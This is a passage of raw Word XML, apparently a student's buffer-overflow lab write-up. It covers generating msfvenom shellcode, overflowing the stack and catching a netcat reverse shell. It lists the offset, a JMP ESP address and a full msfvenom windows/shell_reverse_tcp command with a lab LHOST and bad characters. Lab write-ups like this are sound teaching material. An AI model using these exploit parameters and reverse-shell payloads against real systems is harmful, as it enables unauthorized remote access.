          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A7008C" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then we can fill the rest of the stack with “C’s”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F808C2B" w14:textId="047E9B11" w:rsidR="004C4661" w:rsidRPr="004C4661" w:rsidRDefault="004C4661" w:rsidP="004C4661">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C4661">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Generating and Inserting Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E023E9D" w14:textId="0A1D0B7D" w:rsidR="00F62ECF" w:rsidRDefault="00A7008C" w:rsidP="00F62ECF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Now we</w:t>
      </w:r>
      <w:r w:rsidR="003F5BA6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re done building the code and can now construct the </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BUF code. </w:t>
      </w:r>
      <w:r w:rsidR="00387B3A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>When building msfvenom code</w:t>
      </w:r>
      <w:r w:rsidR="00387B3A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> we need to</w:t>
      </w:r>
      <w:r w:rsidR="00387B3A" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">avoid </w:t>
      </w:r>
      <w:r w:rsidR="00616543" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bad characters</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and fill in the correct listening host IP address. </w:t>
      </w:r>
      <w:r w:rsidR="00CA2533">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because size is a limit the code both </w:t>
      </w:r>
      <w:r w:rsidR="00E220D6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>must</w:t>
      </w:r>
      <w:r w:rsidR="00CA2533">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> be small and not use any bad bytes. </w:t>
      </w:r>
      <w:r w:rsidR="004601EA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fortunately,</w:t>
      </w:r>
      <w:r w:rsidR="00CA2533">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA2533" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="00CA2533">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004601EA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>handles</w:t>
      </w:r>
      <w:r w:rsidR="00CA2533">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> all of this for us and gives us the corresponding </w:t>
      </w:r>
      <w:r w:rsidR="00704AE5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>buf code to add to our script</w:t>
      </w:r>
      <w:r w:rsidR="00F62ECF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E789A" w14:textId="70C4BBE0" w:rsidR="00F62ECF" w:rsidRDefault="00F62ECF" w:rsidP="00F62ECF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Then all that’s left is to overflow the stack one more time</w:t>
      </w:r>
      <w:r w:rsidR="0093586C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. At the same </w:t>
      </w:r>
      <w:r w:rsidR="000C2FD5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>time,</w:t>
      </w:r>
      <w:r w:rsidR="0093586C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> I also set up </w:t>
      </w:r>
      <w:r w:rsidR="000C2FD5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>net cat</w:t>
      </w:r>
      <w:r w:rsidR="0093586C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00F57880">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>listen</w:t>
      </w:r>
      <w:r w:rsidR="0093586C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to port 4444</w:t>
      </w:r>
      <w:r w:rsidR="00F57880">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of anything. When the buffer gets overflow the </w:t>
      </w:r>
      <w:r w:rsidR="00F57880" w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="00F57880">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack will call out to us</w:t>
      </w:r>
      <w:r w:rsidR="000C2FD5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Now we have a reverse shell interface that we can use for further attacks against the target machine.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="000C2FD5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even though only one program was vulnerable we used it to leverage access to the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F04EBB" w14:textId="73094ECC" w:rsidR="00CA0B3B" w:rsidRDefault="00CA0B3B" w:rsidP="00586EBA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515B1AD1" w14:textId="3272DBC5" w:rsidR="00CA0B3B" w:rsidRPr="00CA0B3B" w:rsidRDefault="00586EBA" w:rsidP="00CA0B3B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA0B3B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Offset</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B3B" w:rsidRPr="00CA0B3B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B3B" w:rsidRPr="00CA0B3B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA0B3B" w:rsidRPr="00586EBA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>246</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F209C31" w14:textId="77777777" w:rsidR="00CA0B3B" w:rsidRPr="00CA0B3B" w:rsidRDefault="00CA0B3B" w:rsidP="00CA0B3B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA0B3B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">JMP ESP: </w:t>
      </w:r>
      <w:r w:rsidRPr="00586EBA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x20\x10\xB4\x7C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D28532" w14:textId="5BC3696E" w:rsidR="00A7008C" w:rsidRPr="00586EBA" w:rsidRDefault="00586EBA" w:rsidP="00586EBA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA0B3B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0B3B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>venom</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B3B" w:rsidRPr="00CA0B3B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Code</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B3B" w:rsidRPr="00586EBA">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00CA0B3B" w:rsidRPr="00586EBA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.11 -b '\x00\x0A\x0d\x3d\x20\xff\x40' -f python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A831099" w14:textId="77777777" w:rsidR="00505B22" w:rsidRPr="008E41E2" w:rsidRDefault="00505B22" w:rsidP="00505B22">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E41E2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mistakes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0057F3A7" w14:textId="2059DD97" w:rsidR="0084261A" w:rsidRDefault="00505B22" w:rsidP="00103C97">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0843">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>One mistake I made that cost me a good bit of time was accidently filling in the LHOST with the wrong address. I was accidently putting the IP of the victim machine and not the attackers IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3296B0F7" w14:textId="73E6FEFE" w:rsidR="00103C97" w:rsidRPr="009D0843" w:rsidRDefault="00103C97" w:rsidP="00103C97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The only other major mistake I made was </w:t>
      </w:r>
      <w:r w:rsidR="0038372D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>forgetting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the EIP address is reversed</w:t>
      </w:r>
      <w:r w:rsidR="008A27FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. I was very confused as to why it was giving me a </w:t>
      </w:r>
      <w:r w:rsidR="0038372D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="008A27FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="0038372D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="0038372D" w:rsidRPr="0038372D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A2iA</w:t>
      </w:r>
      <w:r w:rsidR="0038372D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">”. I thought at first, I was looking at the wrong address because that string wasn’t in the generator. Then </w:t>
      </w:r>
      <w:r w:rsidR="008E41E2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r w:rsidR="0038372D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it clicked in my head that it was reversed</w:t>
      </w:r>
      <w:r w:rsidR="008E41E2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and was really </w:t>
      </w:r>
      <w:r w:rsidR="008E41E2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008E41E2" w:rsidRPr="0038372D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="008E41E2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="008E41E2" w:rsidRPr="0038372D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2A</w:t>
      </w:r>
      <w:r w:rsidR="008E41E2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00103C97" w:rsidRPr="009D0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22"/>
    <w:rsid w:val="000C2FD5"/>
    <w:rsid w:val="000E5848"/>
    <w:rsid w:val="00103C97"/>
    <w:rsid w:val="00143E48"/>
    <w:rsid w:val="00195CF3"/>
    <w:rsid w:val="00291BB7"/>
    <w:rsid w:val="003027A1"/>
    <w:rsid w:val="0038372D"/>
    <w:rsid w:val="00387B3A"/>
    <w:rsid w:val="003F5BA6"/>
    <w:rsid w:val="004601EA"/>
    <w:rsid w:val="004C4661"/>
    <w:rsid w:val="004D2821"/>
    <w:rsid w:val="00505B22"/>
    <w:rsid w:val="00511A1E"/>
    <w:rsid w:val="00514916"/>
    <w:rsid w:val="00586EBA"/>
    <w:rsid w:val="005B0CAC"/>
    <w:rsid w:val="00610EEE"/>
    <w:rsid w:val="00616543"/>
    <w:rsid w:val="00657781"/>
    <w:rsid w:val="00704AE5"/>
    <w:rsid w:val="00794CDE"/>
    <w:rsid w:val="007E59E8"/>
    <w:rsid w:val="0084261A"/>
    <w:rsid w:val="008A27FF"/>
    <w:rsid w:val="008E41E2"/>
    <w:rsid w:val="0093586C"/>
    <w:rsid w:val="009D0843"/>
    <w:rsid w:val="00A15F4B"/>
    <w:rsid w:val="00A53B73"/>
    <w:rsid w:val="00A7008C"/>
    <w:rsid w:val="00CA0B3B"/>
    <w:rsid w:val="00CA2533"/>
    <w:rsid w:val="00DC5CF5"/>
    <w:rsid w:val="00DD6968"/>
    <w:rsid w:val="00DF49D7"/>
    <w:rsid w:val="00E220D6"/>
    <w:rsid w:val="00E47A72"/>
    <w:rsid w:val="00F57880"/>
    <w:rsid w:val="00F62ECF"/>
    <w:rsid w:val="00F6478D"/>
    <w:rsid w:val="00FC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4BDA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D9C0547E-C7B0-4C77-ACD2-DD37A854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7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47A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3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cocanig</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Brandon cocanig</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-05T21:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-06T01:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>